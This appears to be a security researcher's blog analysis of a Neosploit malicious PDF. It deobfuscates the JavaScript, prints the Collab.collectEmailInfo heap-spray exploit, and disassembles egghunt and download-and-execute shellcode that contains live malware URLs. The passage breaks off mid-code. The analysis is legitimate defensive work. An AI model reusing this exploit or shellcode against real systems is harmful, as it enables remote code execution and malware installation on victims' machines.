< p0_Y2T.length) {var c_Y4Ti = p0_Y2T.substr(GbFYrkx_PbnQ6f6, 1) + "J";var A_8_QHs1s = parseInt(c_Y4Ti, 16);if (
J8_i60lnd) {ltqGwaY += A_8_QHs1s;if (F_kH_v == 4) {F_kH_v -= 4;}var uYND0Nm = ltqGwaY;uYND0Nm = uYND0Nm - (I1_EB
__2_wf + 2) * M8I2Nb0IWaPT7[F_kH_v];if (uYND0Nm < 0) {var OF0F_A6__nLc = Math.floor(uYND0Nm / 256);uYND0Nm = uYN
D0Nm - OF0F_A6__nLc * 256;}uYND0Nm = String.fromCharCode(uYND0Nm);if (a4__LfE__5a6 == 1) {eG76_l += A_8_QHs1s;}
else if (a4__LfE__5a6 == 2) {eG76_l += uYND0Nm;} else {eG76_l += GbFYrkx_PbnQ6f6;}F_kH_v++;I1_EB__2_wf++;J8_i60l
nd = 0;} else {ltqGwaY = A_8_QHs1s * 16;J8_i60lnd = 1;}GbFYrkx_PbnQ6f6++;}eval(eG76_l);return 0;}
X6__4k3VdJVb0Id(0, "10E5E67437933DC36719A1A5A4B40DA4D8A9BBB4DF662A054BCC55EF7CB512E4914F603DD828A821C29
376A3786906F5F3D1C7FB1B98C73DC440954C8F67BAA4FF217C877A39684B01CFBE5C8F36FE309A3E5DD3D532ACC81E69E13B6A05123AA30
741E0DF8121A15D9705C7546E167C3324D8FF4D50A44245B7A9E4533E67484B643C17F54A584CC4320BEECC7C5B852A3F6C5816DA6D2C613
FF28F8BD8E2BE22DCF4A4F26284F81BBAC4CBA451041AAE6864F24E34A4C6885BE54890631A3C1D9A58CAE71C894FD047FA667F3F7D99B7C
[…]B9647DC9");
Howto Deobfuscate
Ya'know, if you wanted to…
The obfuscation in this case is just a search and replace with random variable names, so just search and replace them back to something meaningful.
- Replace ";" with ";\n" and "}" with "}\n" to pretty-print.
- When you see var M8I2Nb0IWaPT7 = new Array(); you can rename M8I2Nb0IWaPT7 to something more meaningful like "array1".
- When you see eval(eG76_l); you can rename eG76_l to something like evaluated_string.
- When you see for(var 6R_6CyPe=0;6R_6CyPe<0x_17x5;6R_6CyPe+=2){ you can say, oh hey, 6R_6CyPe is an index, and 0x_17x5 is the loop count.
- charCodeAt(index) returns a byte.
- p0_Y2T.substr and s___Q35hFa.length tell you that p0_Y2T and s___Q35hFa are strings, so rename appropriately.
- function X6__4k3VdJVb0Id( is a function, so rename appropriately.
- while(OKD_8Y_tjg < s___Q35hFa.length){ OKD_8Y_tjg++; well, it's a good guess that OKD_8Y_tjg is a loop index.
- Use common sense to make the Javascript legible to humans. (None of this matters if you're a machine.)
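The first few steps above can be roughed out as a pair of throwaway helpers. This is a sketch, not a real deobfuscator: prettyPrint will also break lines inside string literals and for(;;) headers, and renameIdentifiers assumes the old names only contain letters, digits, and underscores. Both function names are invented for this example.

```javascript
// Naive pretty-printer: a newline after every ";" and "}".
function prettyPrint(source) {
  return source.replace(/;/g, ";\n").replace(/\}/g, "}\n");
}

// Whole-word search and replace for each old name -> new name pair.
// Assumption: old names match [A-Za-z0-9_]+, so no regex escaping is needed.
function renameIdentifiers(source, mapping) {
  let out = source;
  for (const [oldName, newName] of Object.entries(mapping)) {
    out = out.replace(new RegExp("\\b" + oldName + "\\b", "g"), newName);
  }
  return out;
}

const snippet = 'var eG76_l = "";eval(eG76_l);';
console.log(prettyPrint(renameIdentifiers(snippet, { eG76_l: "evaluated_string" })));
```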
The Javascript gets a copy of itself (the blob of code being eval()'d) using arguments.callee, which it hashes into a four-byte key. I just added a…
var callee = unescape('%66%75%6e%63%74%69%6f%6e%20%58%36%5f
[...] %6e%20%30%3b%7d');
of the original obfuscated code (just up to the %09 (TAB) character), and replaced arguments.callee.toString() with callee.
function decode(arg1, arg2_hex){
    //var argarg = arguments.callee;
    var argarg = callee; // that unescape() I mentioned
    //var threethings = 0; // Original
    var threethings = 2; // Who cares that app is missing?
    var fivetwelve = 512;
    argarg = argarg.toString();
    try {
        if (app) {
            threethings = 3;
            threethings--; // So you mean 2 then
        }
    } catch(e) {
    }
    var array1 = new Array();
    if (arg1) {
        array1 = arg1;
    } else {
        var fourthings = 0;
        var index = 0;
        var fourtynine = 49;
        fourtynine--; // ok 48 then (it's for ASCII "0")
        while(index < argarg.length) {
            var hYE0g_2_q = 1; // unused
            var input_byte = argarg.charCodeAt(index);
            // In set of [0-9]
            if (input_byte >= fourtynine && input_byte <= (fourtynine + 9)) {
                if (fourthings == 4) {
                    fourthings = 0;
                }
                if (isNaN(array1[fourthings])) {
                    array1[fourthings] = 0;
                }
                array1[fourthings] += input_byte;
                // keep total from getting too big
                if (array1[fourthings] > fivetwelve) {
                    array1[fourthings] -= fivetwelve;
                }
                fourthings++;
            } // if
            index++;
        } // while
    } // if
    print(array1); // 154,315,117,92 (print() is the JS shell's output function)
    fourthings = 4;
    fivetwelve = 256;
    while (fourthings > 0) {
        var index = fourthings - 1;
        // keep to a byte
        if (array1[index] > fivetwelve) { //256
            array1[index] -= fivetwelve; //256
        }
        fourthings--;
    } // while
    var indexmod4 = 0;
    var evaluated = "";
    var JtRA2__j_Ae = 0; // unused
    var index2 = 0;
    var flag = 0;
    var accumulator;
    var index3 = 0;
    while(index2 < arg2_hex.length) {
        // var c_Y4Ti = arg2_hex.substr(index2, 1) + "J";
        var c_Y4Ti = arg2_hex.substr(index2, 1) ;
        var parsedint = parseInt(c_Y4Ti, 16);
        if (flag) {
            // second hex digit: finish the byte and decrypt it
            accumulator += parsedint;
            if (indexmod4 == 4) {
                indexmod4 -= 4;
            }
            var lotsomath = accumulator;
            lotsomath = lotsomath - (index3 + 2) * array1[indexmod4];
            if (lotsomath < 0) {
                var mod256 = Math.floor(lotsomath / 256);
                lotsomath = lotsomath - mod256 * 256;
            }
            // back to a character, as in the obfuscated original
            lotsomath = String.fromCharCode(lotsomath);
            if (threethings == 1) {
                evaluated += parsedint; // This should never run
            } else if (threethings == 2) {
                evaluated += lotsomath; // This is the only line that actually decrypts
            } else {
                evaluated += index2; // This should never run
            }
            indexmod4++;
            index3++;
            flag = 0;
        } else {
            // first hex digit: high nibble of the byte
            accumulator = parsedint * 16;
            flag = 1;
        } // if
        index2++;
    } // while
    eval(evaluated);
    return 0;
}
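Boiled down, the routine above is two steps: hash the digits in the function's own source text into four small numbers, then subtract a position-dependent multiple of those numbers from each hex byte. Here is a compact sketch of just that arithmetic, with no eval(). The names deriveKey, decrypt, and encrypt are mine, and encrypt is only the inverse I wrote to check the round trip; it is not taken from the toolkit.

```javascript
// Sum the ASCII codes of every digit in the text into four rotating slots.
function deriveKey(calleeText) {
  const key = [0, 0, 0, 0];
  let slot = 0;
  for (let i = 0; i < calleeText.length; i++) {
    const c = calleeText.charCodeAt(i);
    if (c >= 48 && c <= 57) {               // ASCII '0'..'9'
      key[slot] += c;
      if (key[slot] > 512) key[slot] -= 512; // keep the running total small
      slot = (slot + 1) % 4;
    }
  }
  return key.map(k => (k > 256 ? k - 256 : k)); // final squeeze, as in the sample
}

// plain[i] = (cipher[i] - (i + 2) * key[i % 4]) mod 256
function decrypt(hex, key) {
  let out = "";
  for (let i = 0; 2 * i + 1 < hex.length; i++) {
    const byte = parseInt(hex.slice(2 * i, 2 * i + 2), 16);
    const v = byte - (i + 2) * key[i % 4];
    out += String.fromCharCode(((v % 256) + 256) % 256);
  }
  return out;
}

// Hypothetical inverse, for testing only.
function encrypt(text, key) {
  let hex = "";
  for (let i = 0; i < text.length; i++) {
    const v = (text.charCodeAt(i) + (i + 2) * key[i % 4]) % 256;
    hex += v.toString(16).toUpperCase().padStart(2, "0");
  }
  return hex;
}

const demoKey = deriveKey("function f1(a2){return 34;}");
console.log(demoKey, decrypt(encrypt("eval me", demoKey), demoKey));
```

Because the key comes from the function text itself, changing so much as one digit in the decoder (say, while pretty-printing it) changes the key, which is why the cleaned-up version feeds in the original text through callee.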
The Next Part After That
And finally, we've made it to the crunchy center of this metaphor. This does the heap spray and exploits Collab.collectEmailInfo(). Nothing really new here.
ar I8tR_yfW_B_G_4 = new Array();var co3L10RH0e_sDj = 0;var k_IbUu = "";function w4U_ES(QnE1DcNMb, c_i4I__W){var LHE7_u = c_i4I__W.toString();var b1oTk__25tEY4 = "";for(var S8_T83_ajR = 0; S8_T83_ajR < LHE7_u.length; S8_T83_ajR++) {var ksHn4MF6Hh4cHia = parseInt(LHE7_u.substr(S8_T83_ajR, 1));if (!isNaN(ksHn4MF6Hh4cHia)) {ksHn4MF6Hh4cHia = ksHn4MF6Hh4cHia.toString(16);if (ksHn4MF6Hh4cHia.length == 1) { ksHn4MF6Hh4cHia = "0" + ksHn4MF6Hh4cHia; }else if (ksHn4MF6Hh4cHia.length != 2) { ksHn4MF6Hh4cHia = "00"; }b1oTk__25tEY4 = ksHn4MF6Hh4cHia + b1oTk__25tEY4;}}while(b1oTk__25tEY4.length < 8) { b1oTk__25tEY4 = "0" + b1oTk__25tEY4; }var k__7_H1 = QnE1DcNMb.toString(16);if (k__7_H1.length == 1) { k__7_H1 = "0" + k__7_H1; }else if (k__7_H1.length != 2) { k__7_H1 = "00"; }b1oTk__25tEY4 = "3" + k__7_H1 + "P" + b1oTk__25tEY4;return b1oTk__25tEY4;}function Bsv_7_w_r_Vmg(H_O610_85G, G_Rp3BOccXCA){var A_p_p7p2__u2x = new Array("");var nd__8__O_E6 = H_O610_85G;var O86U_8;if ((O86U_8 = H_O610_85G.lastIndexOf("%u00")) != -1) {if (O86U_8 + 6 == H_O610_85G.length) {A_p_p7p2__u2x[0] = H_O610_85G.substr(O86U_8 + 4, 2);nd__8__O_E6 = H_O610_85G.substring(0, O86U_8);}}O86U_8 = 1;for (S8_T83_ajR = 0; S8_T83_ajR < G_Rp3BOccXCA.length; S8_T83_ajR++) {var aD3K_EP_v_WML61 = G_Rp3BOccXCA.charCodeAt(S8_T83_ajR).toString(16);if (aD3K_EP_v_WML61.length == 1) { aD3K_EP_v_WML61 = "0" + aD3K_EP_v_WML61; }A_p_p7p2__u2x[O86U_8] = aD3K_EP_v_WML61;O86U_8++;}S8_T83_ajR = A_p_p7p2__u2x[0].length ? 
0 : 1;A_p_p7p2__u2x[O86U_8] = "00";A_p_p7p2__u2x[O86U_8 + 1] = "00";O86U_8 += 2;if ((A_p_p7p2__u2x.length - S8_T83_ajR) % 2) {A_p_p7p2__u2x[O86U_8] = "00";}while(S8_T83_ajR < A_p_p7p2__u2x.length) {nd__8__O_E6 += "%u" + A_p_p7p2__u2x[S8_T83_ajR + 1] + A_p_p7p2__u2x[S8_T83_ajR];S8_T83_ajR += 2;}nd__8__O_E6 += "%u0000";return nd__8__O_E6;}function jM77Vg3(x56C0_13__c, DcG_u7V_L_s_uJ){while (x56C0_13__c.length*2<DcG_u7V_L_s_uJ) {x56C0_13__c += x56C0_13__c;}x56C0_13__c = x56C0_13__c.substring(0,DcG_u7V_L_s_uJ/2);return x56C0_13__c;}function EU_xp43s(cF_t_wgG__usi_4, gtPWfQ6O, l6__x_1d){var h_2G_2 = 0x0c0c0c0c;var x56C0_13__c = unescape(gtPWfQ6O);var G_Rp3BOccXCA = w4U_ES(cF_t_wgG__usi_4, l6__x_1d);var m8Lnd5_UsJ1f = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050&
[egghunt…]%u3350%uc3c0");var H_O610_85G = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc
[shellcode…]
%u3438%u3861%u3361%u3239";app.hVDwfx478 = unescape(Bsv_7_w_r_Vmg(H_O610_85G, G_Rp3BOccXCA));var eY_mn_7_k_Uqk5 = 0x400000;var l825oJ_81__Ny = m8Lnd5_UsJ1f.length * 2;var DcG_u7V_L_s_uJ = eY_mn_7_k_Uqk5 - (l825oJ_81__Ny+0x38);x56C0_13__c = jM77Vg3(x56C0_13__c, DcG_u7V_L_s_uJ);var qj76_s_0_PgMBT = (h_2G_2 - 0x400000)/eY_mn_7_k_Uqk5;for (var Mg_70_P__N_D = 0; Mg_70_P__N_D < qj76_s_0_PgMBT; Mg_70_P__N_D++) {I8tR_yfW_B_G_4[Mg_70_P__N_D] = x56C0_13__c + m8Lnd5_UsJ1f;}}function Ecbg_08LGeWT0(){var SgNX5d = "";for (S8_T83_ajR = 0; S8_T83_ajR < 12; S8_T83_ajR++) {SgNX5d += unescape("%u0c0c%u0c0c");}var PoLA_T6Aa7KrU1s = "";for (S8_T83_ajR = 0; S8_T83_ajR < 750; S8_T83_ajR++) {PoLA_T6Aa7KrU1s += SgNX5d;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: PoLA_T6Aa7KrU1s});app.clearTimeOut(co3L10RH0e_sDj);}function I_w1ifF(o64O_1QbXw){var D__c6_R_Y_qv = co3L10RH0e_sDj;if ((o64O_1QbXw >= 8 && o64O_1QbXw < 8.11) || o64O_1QbXw < 7.1) {EU_xp43s(23, "%u0c0c%u0c0c", o64O_1QbXw);Ecbg_08LGeWT0();} if (D__c6_R_Y_qv) {app.clearTimeOut(D__c6_R_Y_qv);}}var l6__x_1d = 0;var K_U2Nj7_X_3__k = app.plugIns;for (var clWu_2 = 0; clWu_2 < K_U2Nj7_X_3__k.length; clWu_2++) {var A_x_Hr7 = K_U2Nj7_X_3__k[clWu_2].version;if (A_x_Hr7 > l6__x_1d) { l6__x_1d = A_x_Hr7; }}if (app.viewerVersion == 9.103 && l6__x_1d < 9.13) {l6__x_1d = 9.13;}app.C_1aWSr__pbK_tN = I_w1ifF;co3L10RH0e_sDj = app.setTimeOut("app.C_1aWSr__pbK_tN(" + l6__x_1d.toString() + ")", 50);
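To put numbers on that blob, here is a back-of-the-envelope sketch of the spray loop count and the version gate, with the constants copied from the code above (0x0c0c0c0c, 0x400000, and the comparisons in I_w1ifF). The function names are hypothetical, and nothing here touches Acrobat.

```javascript
// How many times the spray loop "for (i = 0; i < (target - block) / block; i++)" runs.
function sprayBlockCount(targetAddress, blockSize) {
  return Math.ceil((targetAddress - blockSize) / blockSize);
}

// The version check guarding the exploit call, as written in the sample.
function isTargetedVersion(v) {
  return (v >= 8 && v < 8.11) || v < 7.1;
}

const blocks = sprayBlockCount(0x0c0c0c0c, 0x400000);
console.log(blocks, "blocks, about 0x" + (blocks * 0x400000).toString(16), "bytes");
console.log([7.0, 7.1, 8.1, 8.11, 9.13].map(isTargetedVersion));
```

So the loop allocates just enough 4 MB strings to reach the neighborhood of 0x0c0c0c0c, and the exploit is only fired at reader versions the check considers vulnerable.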
Editorial About Parsing PDFs
Congratulations! If you've made it this far, you're much further along than most PDF scanners. Most don't make it past the getAnnots() call. And, in the future, things are only going to get worse. There are thousands and thousands of object properties available from inside the Acrobat Javascript environment.
To fully parse, not only must you do everything in these:
- JavaScript for Acrobat API Reference 8.1
- PDF 1.7 Reference ISO 32000-1:2008
- PDF Reference and Adobe Extensions to the PDF Specification (ISO 32000-1:2008)
for completeness
But you must also handle error cases in the exact same way that Acrobat does. Your parser must be bug-compatible with Acrobat. And, OMG, the things you can do inside of a PDF. (Which I'll decline to say at the moment, lest I give anyone any ideas about new obfuscation techniques. Not that obfuscation poses any problems for us…)
Q: So how does FireEye parse PDFs?
A: We use Adobe Acrobat versions 7, 8, and 9 to parse and execute the file.
Oh this is telling...
ISO 32000-1:2008 specifies a digital form for representing electronic documents to enable users to exchange and view electronic documents independent of the environment in which they were created or the environment in which they are viewed or printed. It is intended for the developer of software that creates PDF files (conforming writers), software that reads existing PDF files and interprets their contents for display and interaction (conforming readers) and PDF products that read and/or write PDF files for a variety of other purposes (conforming products).
ISO 32000-1:2008 does not specify the following:
- specific processes for converting paper or electronic documents to the PDF format;
- specific technical design, user interface or implementation or operational details of rendering;
- specific physical methods of storing these documents such as media and storage conditions;
- →methods for validating the conformance of PDF files or readers;←
- required computer hardware and/or operating system.
Shellcode
There are two chunks of shellcode: one is Skape's old egghunt shellcode (using the egg value 0x9050905090509050), and the other is a common URLMon download-and-WinExec() shellcode. (I've seen it in a lot of malware lately, and in a post on some Chinese message board.)
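Both chunks arrive as %u-escaped strings handed to unescape(), so the first step in reading them is turning the escapes back into bytes. A minimal Python sketch, assuming each %uXXXX unit ends up in memory as a little-endian 16-bit value (which is how the disassembly below lines up); the helper name unescape_u is hypothetical and plain %XX escapes are ignored:

```python
import re

def unescape_u(text):
    """Turn %uXXXX escapes into the bytes they occupy in memory (little-endian)."""
    out = bytearray()
    for unit in re.findall(r"%u([0-9A-Fa-f]{4})", text):
        # Each unit is one UTF-16 code unit; the low byte comes first in memory.
        out += int(unit, 16).to_bytes(2, "little")
    return bytes(out)

# %uC033%u8B64 becomes 33 C0 64 8B, i.e. the start of "xor eax,eax / mov eax,[fs:...]".
print(unescape_u("%uC033%u8B64").hex())
```

The output can be fed to any x86 disassembler to get listings like the ones in this section.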
Egghunt Shellcode
Just go read this: egghunt.c
00000000 90 nop
00000001 90 nop
00000002 90 nop
00000003 90 nop
00000004 90 nop
00000005 90 nop
00000006 EB21 jmp short 0x29
00000008 59 pop ecx
00000009 B850905090 mov eax,0x90509050
0000000E 51 push ecx
0000000F 6AFF push byte -0x1
00000011 33DB xor ebx,ebx
00000013 648923 mov [fs:ebx],esp
00000016 6A02 push byte +0x2
00000018 59 pop ecx
00000019 8BFB mov edi,ebx
0000001B F3AF repe scasd
0000001D 7507 jnz 0x26
0000001F FFE7 jmp edi
00000021 6681CBFF0F or bx,0xfff
00000026 43 inc ebx
00000027 EBED jmp short 0x16
00000029 E8DAFFFFFF call 0x8
0000002E 6A0C push byte +0xc
00000030 59 pop ecx
00000031 8B040C mov eax,[esp+ecx]
00000034 B1B8 mov cl,0xb8
00000036 83040806 add dword [eax+ecx],byte +0x6
0000003A 58 pop eax
0000003B 83C410 add esp,byte +0x10
0000003E 50 push eax
0000003F 33C0 xor eax,eax
00000041 C3 ret
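For anyone who would rather not read egghunt.c, here is a rough Python model of what the search loop above does: walk memory looking for two back-to-back copies of the dword in EAX, then continue execution right after them. This sketch treats memory as one flat bytes object and leaves out the exception-handler trick the real code uses to skip unreadable pages; the function name hunt is hypothetical.

```python
import struct

EGG_DWORD = 0x90509050                     # value loaded into EAX at offset 0x09
EGG = struct.pack("<I", EGG_DWORD) * 2     # two consecutive copies, as repe scasd checks them

def hunt(memory):
    """Return the offset just past the first doubled egg, or None if absent."""
    for start in range(len(memory) - len(EGG) + 1):
        if memory[start:start + len(EGG)] == EGG:
            return start + len(EGG)        # where `jmp edi` would land
    return None

# Toy memory image: padding, the doubled egg, then a stand-in payload byte.
image = b"\x00" * 10 + EGG + b"\xcc"
print(hunt(image))
```

Requiring the egg twice is what keeps the hunter from finding the single copy embedded in its own `mov eax` instruction.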
Download to File and Exec
I started to comment this, because I haven't actually found a marked up version of it via Google, but I was also supposed to have had this blog post done last week. So I'll document the rest of this at a later date. There are actually two samples here, but they only differ by a few instructions, so I've written in the differences in inline comments.
00000000 90 nop
00000001 90 nop
00000002 90 nop
00000003 90 nop
00000004 90 nop
00000005 90 nop
00000006 90 nop
00000007 90 nop
00000008 90 nop
00000009 90 nop
0000000A E800000000 call 0xf ; Leave EIP on the stack for later
0000000F EB00 jmp short 0x11 ; i.e. the base address of this shellcode
00000011 E9FC000000 jmp 0x112 ; Get EIP again, base address of offset 0x112
00000016 5F pop edi ; EDI = EIP = The end
00000017 64A130000000 mov eax,[fs:0x30] ; PEB
0000001D 780C js 0x2b ; Check if Windows 95
0000001F 8B400C mov eax,[eax+0xc] ; PEB->Ldr (PEB_LDR_DATA)
00000022 8B701C mov esi,[eax+0x1c] ; InInitializationOrderModuleList.Flink
00000025 AD lodsd ; EAX = Flink of the first entry (the next module)
00000026 8B6808 mov ebp,[eax+0x8] ; EBP = kernel32 module base address
00000029 EB09 jmp short 0x34
0000002B 8B4034 mov eax,[eax+0x34] ; Windows 9x boilerplate
0000002E 8D407C lea eax,[eax+0x7c] ; Because everyone just copies everyone
00000031 8B683C mov ebp,[eax+0x3c] ; else's (Skape's) shellcode
00000034 8BF7 mov esi,edi ; ESI = The end, and beginning of hashes
00000036 6A04 push byte +0x4
00000038 59 pop ecx ; ECX = 0x00000004
00000039 E88F000000 call 0xcd ; find_functions
0000003E E2F9 loop 0x39
00000040 686F6E0000 push dword 0x6e6f ;
00000045 6875726C6D push dword 0x6d6c7275 ; "urlmon"
0000004A 54 push esp
0000004B FF16 call near [esi] ; loadLibraryA
0000004D 8BE8 mov ebp,eax
0000004F E879000000 call 0xcd
00000054 8BD7 mov edx,edi
00000056 47 inc edi ;
00000057 803F00 cmp byte [edi],0x0
0000005A 75FA jnz 0x56 ; End of string
0000005C 47 inc edi ; Skip null
0000005D 57 push edi ; Beginning of next string
0000005E 47 inc edi ;
0000005F 803F00 cmp byte [edi],0x0
00000062 75FA jnz 0x5e
00000064 8BEF mov ebp,edi ; EDI points to end of string
00000066 5F pop edi ; EDI Beginning of string
00000067 33C9 xor ecx,ecx
00000069 81EC04010000 sub esp,0x104 ; make 260 bytes of space
0000006F 8BDC mov ebx,esp
; This is the first instruction that these two samples diverge on:
; Only one of them has this.
; 00000071 83C30C add ebx,byte +0xc ; Leave 12 bytes of space for "regsvr32 -s "
00000071 51 push ecx ; 0
00000072 52 push edx ;
00000073 53 push ebx ; End of string
00000074 6804010000 push dword 0x104 ; 260
00000079 FF560C call near [esi+0xc] ; GetTempPathA
0000007C 5A pop edx
0000007D 59 pop ecx ;
0000007E 51 push ecx ; jump target from 0xC8
0000007F 52 push edx
00000080 8B02 mov eax,[edx]
00000082 53 push ebx ; Filename
00000083 43 inc ebx
00000084 803B00 cmp byte [ebx],0x0
00000087 75FA jnz 0x83 ; EBX points to end
00000089 817BFC2E657865 cmp dword [ebx-0x4],0x6578652e ; Ends with ".exe"?
; The other version of this shellcode uses ".dll" rather than ".exe"
; 0000008C 817BFC2E646C6C cmp dword [ebx-0x4],0x6c6c642e ; ".dll"
00000090 7503 jnz 0x95
00000092 83EB08 sub ebx,byte +0x8
00000095 8903 mov [ebx],eax ; Doesn't end with ".exe"
00000097 C743042E657865 mov dword [ebx+0x4],0x6578652e ; So append ".exe"
; Again with the DLL
; C743042E646C6C mov dword [ebx+0x4],0x6c6c642e ; ".dll"
0000009E C6430800 mov byte [ebx+0x8],0x0 ; ".exe\0"
000000A2 5B pop ebx
000000A3 8AC1 mov al,cl
000000A5 0430 add al,0x30
000000A7 884500 mov [ebp+0x0],al
000000AA 33C0 xor eax,eax
000000AC 50 push eax ; NULL lpfnCB
000000AD 50 push eax ; NULL dwReserved
000000AE 53 push ebx ; szFileName
000000AF 57 push edi ; szURL
000000B0 50 push eax ; NULL pCaller
000000B1 FF5610 call near [esi+0x10] ; URLDownloadToFileA
000000B4 83F800 cmp eax,byte +0x0 ; Download ok?
000000B7 7506 jnz 0xbf
000000B9 6A01 push byte +0x1 ; SW_SHOWNORMAL maybe?
; The alternative version executes "regsvr32 -s " rather than just a tempfile EXE name
; 83EB0C sub ebx,byte +0xc ; back up 12 bytes from beginning
; C70372656773 mov dword [ebx],0x73676572 ; "regs"
; C7430476723332 mov dword [ebx+0x4],0x32337276 ; "vr32"
; C74308202D7320 mov dword [ebx+0x8],0x20732d20 ; " -s "
000000BB 53 push ebx ; Command Line
000000BC FF5604 call near [esi+0x4] ; WinExec
000000BF 5A pop edx
000000C0 59 pop ecx
000000C1 83C204 add edx,byte +0x4
000000C4 41 inc ecx
000000C5 803A00 cmp byte [edx],0x0
000000C8 75B4 jnz 0x7e
000000CA FF5608 call near [esi+0x8] ; ExitProcess
find_functions:
000000CD 51 push ecx ; 0x00000004
000000CE 56 push esi ; The end (0x117)
000000CF 8B753C mov esi,[ebp+0x3c] ; PE header VMA
000000D2 8B742E78 mov esi,[esi+ebp+0x78] ; Export table relative offset
; This is just an alternative coding of the same instruction, X86 is full of things like this
; 8B743578 mov esi,[ebp+esi+0x78]
000000D6 03F5 add esi,ebp ; Export table VMA
000000D8 56 push esi
000000D9 8B7620 mov esi,[esi+0x20] ; Names table relative offset
000000DC 03F5 add esi,ebp ; esi = Names table VMA
000000DE 33C9 xor ecx,ecx ;
000000E0 49 dec ecx ; ecx = 0xffffffff
000000E1 41 inc ecx ; jmp from 0xF8
000000E2 AD lodsd ; eax = *esi = *Names table VMA
000000E3 03C5 add eax,ebp
000000E5 33DB xor ebx,ebx
000000E7 0FBE10 movsx edx,byte [eax] ; next entry
000000EA 3AD6 cmp dl,dh ; check for NULL (at end of table)
; Another alternative coding. This seems to imply the original source was symbolic,
; and (re)compiled/assembled to create the other version.
; 38F2 cmp dl,dh
000000EC 7408 jz 0xf6
000000EE C1CB0D ror ebx,0xd ; compute hash
000000F1 03DA add ebx,edx ; compute hash ebx = accumulator
000000F3 40 inc eax
000000F4 EBF1 jmp short 0xe7
000000F6 3B1F cmp ebx,[edi]
000000F8 75E7 jnz 0xe1
000000FA 5E pop esi
000000FB 8B5E24 mov ebx,[esi+0x24] ; Ordinals table relative offset
000000FE 03DD add ebx,ebp ; Ordinals table VMA
00000100 668B0C4B mov cx,[ebx+ecx*2] ; Extrapolate function's ordinal
00000104 8B5E1C mov ebx,[esi+0x1c] ; Address table relative offset
00000107 03DD add ebx,ebp ; Address table VMA
00000109 8B048B mov eax,[ebx+ecx*4] ; Extract the relative function offset from its ordinal
0000010C 03C5 add eax,ebp ; Function VMA
0000010E AB stosd ; *edi = eax
0000010F 5E pop esi
00000110 59 pop ecx
00000111 C3 ret
00000112 E8FFFEFFFF call 0x16 ; Get EIP *here = End of shellcode
00000117 db 8e 4e 0e ec ; [ESI+0] 0xec0e4e8e LoadLibraryA
0000011B db 98 fe 8a 0e ; [ESI+4] 0x0e8afe98 WinExec
0000011F db 7e d8 e2 73 ; [ESI+8] 0x73e2d87e ExitProcess
00000123 db 33 ca 8a 5b ; [ESI+C] 0x5b8aca33 GetTempPathA
00000127 db 36 1a 2f 70 ; [ESI+10] 0x702f1a36 URLDownloadToFileA
0000012B db 6b 74 47 6f 00 ; "ktGo" ??
;Alt: db 6c 4c 70 6f 00 ; "lLpo" ??
0000014A 68 74 74 70 3a 2f ; http:/
00000150 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2e 61 6e 61 6c ; /google.com.anal
00000160 79 74 69 63 73 2e 65 69 63 79 78 74 61 65 63 75 ; ytics.eicyxtaecu
00000170 6e 2e 63 6f 6d 2f 6e 74 65 2f 41 56 4f 52 50 31 ; n.com/nte/AVORP1
00000180 54 52 45 53 54 31 31 2e 70 79 2f 65 48 39 39 39 ; TREST11.py/eH999
00000190 61 34 35 35 31 56 30 31 30 30 66 30 37 30 30 30 ; a4551V0100f07000
000001a0 36 52 30 30 30 30 30 30 30 30 31 30 32 54 64 32 ; 6R00000000102Td2
000001b0 64 63 63 61 37 64 32 30 31 6c 30 34 30 39 4b 39 ; dcca7d201l0409K9
000001c0 31 61 36 38 39 34 38 33 32 30 00 00 ; 1a68948320..
00000130 db 68 74 74 70 3a 2f 2f 6c 61 72 79 6a 75 2e 69 6e ; http://laryju.in
00000140 db 66 6f 2f 63 67 69 2d 62 69 6e 2f 71 77 2f 65 48 ; fo/cgi-bin/qw/eH
00000150 db 33 66 63 37 66 34 39 65 56 30 31 30 30 66 30 36 ; 3fc7f49eV0100f06
00000160 db 30 30 30 36 52 30 30 30 30 30 30 30 30 31 30 32 ; 0006R00000000102
00000170 db 54 36 63 64 63 38 39 37 38 32 30 31 6c 30 34 30 ; T6cdc8978201l040
00000180 db 39 00 ; 9.
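The five dwords at [ESI+0] through [ESI+10] are hashes of export names, and the rotate-and-add loop at 0xE7 through 0xF4 is short enough to reproduce. A small Python sketch of that loop (rotate right by 13, add the next character, stop before the terminating NUL); the function name ror13_hash is my own label:

```python
def ror13_hash(name):
    """Hash an export name the way the loop at 0xE7..0xF4 does."""
    h = 0
    for ch in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF   # ror ebx,0xd
        h = (h + ch) & 0xFFFFFFFF                  # add ebx,edx
    return h

for api in ("LoadLibraryA", "WinExec", "ExitProcess",
            "GetTempPathA", "URLDownloadToFileA"):
    print(f"{api:20s} 0x{ror13_hash(api):08x}")
```

Running candidate API names through this and comparing against the table is how the names in the comments above can be checked; remember the table stores each hash little-endian, so 0x0e8afe98 appears as 98 fe 8a 0e.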
Breaking News
So, after I'd already written most of this, another PDF sample showed up, also using similar metadata tricks, but in a different way than these Neosploit samples. I suspect it's a different toolkit, as the PDF is structured differently.
[The URL will be something like http://<ip address>/bbh/pdf.php.]
This PDF is also exploiting the recent Adobe 0-day CVE-2009-4324 (and a few others for good measure).
You should all know how to read this by now.
(Unless you've skipped over this entire post to here.)
I'm using 323cd2b18026019ab8364efa96893062 for this example.
The Javascript segments are referenced like this in the PDF.
9 0 obj
<</Creator (Adobe)
/Title 5 0 R
/Producer 14 0 R
/Author 51 0 R
/CreationDate (D:20080924194756)
>>
endobj
This object (the info.Author) has the exploit:
51 0 obj
<<
/Filter /FlateDecode
/Length 2630
>>
stream
Decompressed it's "lka166lka175lka16elka163lka174lka169lka16 […]
endstream
endobj
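Getting from the /Author reference to the decompressed text can be approximated with a couple of regular expressions and zlib. This is only a sketch under generous assumptions: it ignores the xref table, object streams, and every filter except FlateDecode, and it can be fooled when an object without a stream precedes one that has a stream. The function names info_reference and inflate_object are hypothetical.

```python
import re
import zlib

def info_reference(pdf_bytes, key):
    """Return (object, generation) for an indirect reference like `/Author 51 0 R`."""
    m = re.search(rb"/" + re.escape(key) + rb"\s+(\d+)\s+(\d+)\s+R", pdf_bytes)
    return (int(m.group(1)), int(m.group(2))) if m else None

def inflate_object(pdf_bytes, obj_num, gen=0):
    """Find `N G obj ... stream ... endstream` and return the inflated stream."""
    pattern = re.compile(
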